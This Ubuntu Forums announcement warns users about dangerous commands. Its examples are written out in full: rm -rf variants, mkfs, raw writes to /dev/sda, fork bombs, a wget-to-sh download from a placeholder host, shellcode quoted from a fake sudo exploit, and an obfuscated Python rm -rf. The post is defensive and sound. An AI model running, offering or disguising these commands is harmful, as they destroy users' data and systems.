Ubuntu Forums has a strict zero-tolerance policy when it comes to posting dangerous commands. In the past members have been banned for posting dangerous commands. If the intent is malicious, this is simply unnacceptable. If it is meant as a joke – it is not funny.

Please be cautious when a command is suggested or if directed to download script/s as a solution to a problem. When in doubt as to the safety of the procedure, it's always a good idea to wait for more opinions, and/or have the command explained and verify if the explanation makes sense by consulting readily available documentation on Linux commands (such as manpages). If you have any doubts about the content of a command or script, report the post/thread and forum staff will investigate.

Please take care when posting commands or scripts to assist other users. Post only well known, documented and current commands appropriate for the operating system in use, or scripts from reputable sources. If you do post commands in order to help someone but which have the potential to be dangerous, always make sure you warn possible users of the dangers, not just to the user you are helping, but others who may come across the post later. If posting scripts that help with various tasks, please be prepared to provide a source and description of the content.



As requested by some, for the education of our users, here are some common examples of dangerous commands that should raise a bright red flag. Again, these are extremely dangerous and should not be attempted on a computer that has any physical connection to valuable data -- many of them will even cause damage from a LiveCD environment.

Again, DANGEROUS COMMANDS -- look but DO NOT RUN.

Also, this is far from an exhaustive list, but should give you some clues as to what kind of things people may try to trick you into doing. Remember this can always be disguised in an obfuscated command or as a part of a long procedure, so the bottom line is take caution for yourself when something just doesn't "feel right".

Delete all files, delete current directory, and delete visible files in current directory. It's quite obvious why these commands can be dangerous to execute.
Code:
rm -rf /
rm -rf .
rm -rf *
The only problem is that “..”, the link to the previous directory, will be matched by this and this will in turn delete everything above this directory level (oops!). A possible alternative for this would be
Code:
rm -r .[^.]*
which will exclude the entry "..". Of course, it probably has limitations of not matching certain entries, fixing which is an exercise left to the reader.

Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
Code:
mkfs
mkfs.ext3
mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
Code:
any_command > /dev/sda
dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash: (This thing looks really intriguing and curiousity provokes)
Code:
:(){:|:&};:
In Perl
Code:
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory

Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should not touch data from an untrusted source

Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses -- benign or malevolent. Do not execute code from people you don't trust
Code:
wget http://some_place/some_file
sh ./some_file
Code:
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).

A famous example of this surfaced on a mailing list disguised as a proof of concept sudo exploit claiming that if you run it, sudo grants you root without a shell. In it was this payload:
Code:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even lightly experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs rm -rf ~ / & which will destroy your home directory as a regular user, or all files as root. If you could see this command in the hex string, then you don't need to be reading this announcement. Otherwise, remember that these things can come in very novel forms -- watch out.


Again, recall these are not at all comprehensive and you should not use this as a checklist to determine if a command is dangerous or not!

For example, 30 seconds in Python yields something like this:
Code:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Where "sn!.sg!+" is simply rm -rf * shifted a character up. Of course this is a silly example, but nevertheless an inexperienced user might be tricked into pasting this into their terminal without suspecting something might be wrong.



This announcement is a collaborative effort by the ubuntuforums staff, based on an earlier text originally prepared by former forum admin jdong.